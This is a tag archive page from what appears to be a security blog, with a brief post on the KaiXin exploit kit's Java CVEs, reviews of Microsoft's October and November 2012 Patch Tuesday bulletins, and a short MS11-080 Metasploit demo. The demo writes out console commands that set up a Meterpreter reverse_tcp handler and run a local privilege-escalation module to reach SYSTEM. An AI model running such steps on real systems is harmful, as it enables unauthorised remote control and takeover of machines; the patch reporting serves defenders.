Tag Archives: Microsoft

KaiXin Exploit Kit Evolutions

At the beginning of August, Kahu Security discovered a new Chinese exploit kit named KaiXin EK. Like its sibling Gong Da (Gondad) EK, this exploit kit uses the “Yszz vip” JavaScript obfuscation.

The August version of KaiXin supported:

The November version of KaiXin has evolved by dropping support for the Oracle Java CVE-2012-0507 and CVE-2012-0754 vulnerabilities and adding support for Oracle Java CVE-2012-1723 (fixed in the June 2012 CPU), Oracle Java CVE-2012-4681 (fixed in the end-of-August Oracle Security Alert) and Oracle Java CVE-2012-5076 (fixed in the October 2012 CPU).

Below is a VirusTotal analysis of all the files involved:

The following diagram describes how the November version of KaiXin EK works.

Microsoft November 2012 Patch Tuesday Review

On 13 November 2012, during its November Patch Tuesday, Microsoft released two updated security advisories and six security bulletins. Four of the six security bulletins have a Critical security rating.

Microsoft Security Advisory 2269637

MSA-2269637, released in August 2010, has been updated. The security advisory concerns “Insecure Library Loading” and the update adds a reference to MS12-074 “Vulnerabilities in .NET Framework Could Allow Remote Code Execution”.

Microsoft Security Advisory 2749655

MSA-2749655, released in October 2012, has been updated. The security advisory concerns “Compatibility Issues Affecting Signed Microsoft Binaries” and the update modifies the KB references for the “Microsoft Office 2003 Service Pack 3” updates.

MS12-071 – Cumulative Security Update for Internet Explorer

The MS12-071 security update, classified as Critical and allowing remote code execution, fixes three privately reported vulnerabilities. CVE-2012-1538 has a 9.3 CVSS base score and was discovered and privately reported by Jose A. Vazquez of spa-s3c.blogspot.com, working with VeriSign iDefense Labs. CVE-2012-1539 has a 10.0 CVSS base score and was discovered and privately reported by Jose A. Vazquez of spa-s3c.blogspot.com, working with VeriSign iDefense Labs. CVE-2012-4775 has a 9.3 CVSS base score and was discovered and privately reported by Cheng-da Tsai (Orange), Sung-ting Tsai, and Ming-chieh Pan (Nanika) of Trend Micro.

Affected software is:

  • Internet Explorer 9

MS12-072 – Vulnerabilities in Windows Shell Could Allow Remote Code Execution

The MS12-072 security update, classified as Critical and allowing remote code execution, fixes two privately reported vulnerabilities. CVE-2012-1527 has a 9.3 CVSS base score and was discovered and privately reported by Tal Zeltzer, working with VeriSign iDefense Labs. CVE-2012-1528 has a 9.3 CVSS base score and was discovered and privately reported by Tal Zeltzer, working with VeriSign iDefense Labs.

Affected software is:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for 64-bit Systems
  • Windows Server 2012

MS12-074 – Vulnerabilities in .NET Framework Could Allow Remote Code Execution

The MS12-074 security update, classified as Critical and allowing remote code execution, fixes five privately reported vulnerabilities. CVE-2012-1895 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-1896 has a 5.0 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-2519 has a 7.9 CVSS base score and was discovered and privately reported. CVE-2012-4776 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-4777 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security.

Affected software is:

  • Microsoft .NET Framework 1.1 Service Pack 1
  • Microsoft .NET Framework 1.0 Service Pack 3
  • Microsoft .NET Framework 2.0 Service Pack 2
  • Microsoft .NET Framework 1.1
  • Microsoft .NET Framework 3.5
  • Microsoft .NET Framework 3.5.1
  • Microsoft .NET Framework 4
  • Microsoft .NET Framework 4.5

MS12-075 – Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution

The MS12-075 security update, classified as Important and allowing remote code execution, fixes three privately reported vulnerabilities. CVE-2012-2530 has a 7.2 CVSS base score and was discovered and privately reported. CVE-2012-2553 has a 7.2 CVSS base score and was discovered and privately reported by Matthew Jurczyk of Google Inc. CVE-2012-2897 has a 10.0 CVSS base score and was discovered and privately reported by Eetu Luodemaa and Joni Vähämäki of Documill, working with the Chromium Security Rewards Program.

Affected software is:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for 64-bit Systems
  • Windows Server 2012

MS12-076 – Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution

The MS12-076 security update, classified as Important and allowing remote code execution, fixes four privately reported vulnerabilities. CVE-2012-1885 has a 9.3 CVSS base score and was discovered and privately reported by Sean Larsson, working with the iDefense VCP. CVE-2012-1886 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with the iDefense VCP. CVE-2012-1887 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with the iDefense VCP. CVE-2012-2543 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with HP TippingPoint’s Zero Day Initiative.

Affected software is:

  • Microsoft Office 2003 Service Pack 3
  • Microsoft Office 2007 Service Pack 2
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 1 (32-bit editions)
  • Microsoft Office 2010 Service Pack 1 (64-bit editions)
  • Microsoft Office 2008 for Mac
  • Microsoft Office for Mac 2011
  • Microsoft Excel Viewer
  • Microsoft Office Compatibility Pack Service Pack 2
  • Microsoft Office Compatibility Pack Service Pack 3

MS12-073 – Vulnerability in Kerberos Could Allow Denial of Service

The MS12-073 security update, classified as Moderate and allowing information disclosure, fixes two vulnerabilities. CVE-2012-2531 has a 2.1 CVSS base score and was discovered and privately reported by Justin Royce of ProDX. CVE-2012-2532 has a 5.0 CVSS base score and was discovered and publicly reported.

Affected software is:

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Microsoft October 2012 Patch Tuesday Review

On 9 October 2012, during its October Patch Tuesday, Microsoft released one new security advisory, two security advisory updates and nine security bulletins. Of the seven security bulletins, one has a Critical security rating.

Microsoft Security Advisory 2661254

MSA-2661254, released during the Microsoft August 2012 Patch Tuesday, has been updated. This security advisory is a follow-up to the consequences of the Flame malware attacks. As planned and announced, this MSA is now pushed as a security update through KB2661254.

Microsoft Security Advisory 2737111

MSA-2737111, released during the Microsoft August 2012 Patch Tuesday, has been updated. The update reflects the publication of MS12-067 for Microsoft FAST Search Server 2010 for SharePoint.

Microsoft Security Advisory 2749655

MSA-2749655 concerns an issue involving specific digital certificates that Microsoft generated without proper timestamp attributes. This could cause compatibility issues between the affected binaries and Microsoft Windows.

MS12-064 – Vulnerabilities in Microsoft Word Could Allow Remote Code Execution

The MS12-064 security update, classified as Critical and allowing remote code execution, fixes two privately reported vulnerabilities. CVE-2012-0182 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with TippingPoint’s Zero Day Initiative. CVE-2012-2528 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with Beyond Security’s SecuriTeam Secure Disclosure program.

Affected software is:

  • Microsoft Office 2003 Service Pack 3
  • Microsoft Office 2007 Service Pack 2 & Service Pack 3
  • Microsoft Office 2010 Service Pack 1 (32-bit and 64-bit editions)
  • Microsoft Word Viewer 
  • Microsoft Office Compatibility Pack Service Pack 2 & Service Pack 3

MS12-065 – Vulnerability in Microsoft Works Could Allow Remote Code Execution

The MS12-065 security update, classified as Important and allowing remote code execution, fixes one vulnerability, CVE-2012-2550. This vulnerability has a 9.3 CVSS base score and was discovered and privately reported by an unknown security researcher.

Affected software is:

  • Microsoft Works 9

MS12-066 – Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege

The MS12-066 security update, classified as Important and allowing elevation of privilege, fixes one vulnerability, CVE-2012-2520. This vulnerability has a 4.3 CVSS base score and was discovered, being exploited in the wild, by Drew Hintz of the Google Security Team.

Affected software is:

  • Microsoft InfoPath 2007 Service Pack 2 & Service Pack 3
  • Microsoft InfoPath 2010 Service Pack 1 (32-bit & 64-bit editions)
  • Microsoft Communicator 2007 R2
  • Microsoft Lync 2010 (32-bit & 64-bit)
  • Microsoft Lync 2010 Attendee
  • Microsoft SharePoint Server 2007 Service Pack 2 & Service Pack 3 (32-bit & 64-bit editions)
  • Microsoft SharePoint Server 2010 Service Pack 1
  • Microsoft Groove Server 2010 Service Pack 1
  • Microsoft Windows SharePoint Services 3.0 Service Pack 2 (32-bit & 64-bit version)
  • Microsoft SharePoint Foundation 2010 Service Pack 1 
  • Microsoft Office Web Apps 2010 Service Pack 1

MS12-067 – Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution

The MS12-067 security update, classified as Important and allowing remote code execution, fixes multiple vulnerabilities that were also fixed in MS12-058 during the Microsoft August 2012 Patch Tuesday.

MS12-068 – Vulnerability in Windows Kernel Could Allow Elevation of Privilege

The MS12-068 security update, classified as Important and allowing elevation of privilege, fixes one vulnerability, CVE-2012-2529. This vulnerability has a 6.9 CVSS base score and was discovered and privately reported by an anonymous researcher, working with VeriSign iDefense Labs.

Affected software is:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

MS12-069 – Vulnerability in Kerberos Could Allow Denial of Service

The MS12-069 security update, classified as Important and allowing denial of service, fixes one vulnerability, CVE-2012-2551. This vulnerability has a 5.0 CVSS base score and was discovered and privately reported by an unknown security researcher.

Affected software is:

  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

MS12-070 – Vulnerability in SQL Server Could Allow Elevation of Privilege

The MS12-070 security update, classified as Important and allowing elevation of privilege, fixes one vulnerability, CVE-2012-2552. This vulnerability has a 4.3 CVSS base score and was discovered and privately reported by an unknown security researcher.

Affected software is:

  • Microsoft SQL Server 2000 Reporting Services Service Pack 2
  • Microsoft SQL Server 2005 Express Edition with Advanced Services Service Pack 4
  • Microsoft SQL Server 2005 for 32-bit Systems Service Pack 4
  • Microsoft SQL Server 2005 for x64-based Systems Service Pack 4
  • Microsoft SQL Server 2008 for 32-bit Systems Service Pack 2
  • Microsoft SQL Server 2008 for 32-bit Systems Service Pack 3
  • Microsoft SQL Server 2008 for x64-based Systems Service Pack 2
  • Microsoft SQL Server 2008 for x64-based Systems Service Pack 3
  • Microsoft SQL Server 2008 R2 for 32-bit Systems Service Pack 1
  • Microsoft SQL Server 2008 R2 for x64-based Systems Service Pack 1
  • Microsoft SQL Server 2012 for 32-bit Systems
  • Microsoft SQL Server 2012 for x64-based Systems

MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo

Timeline :

Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability on 2011-10-11
Metasploit PoC provided on 2012-10-02

PoC provided by :

Bo Zhou
Matteo Memelli
Spencer McIntyre

Reference(s) :

MS11-080
CVE-2011-2005

Affected version(s) :

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2

Tested on Windows XP Pro SP3 with :

N/A

Description :

This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and, when triggered with a call to NtQueryIntervalProfile, will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring its own token to avoid causing system instability.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sessions -i 1
getuid
sysinfo
background

use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit

sessions -i 2
sysinfo
getuid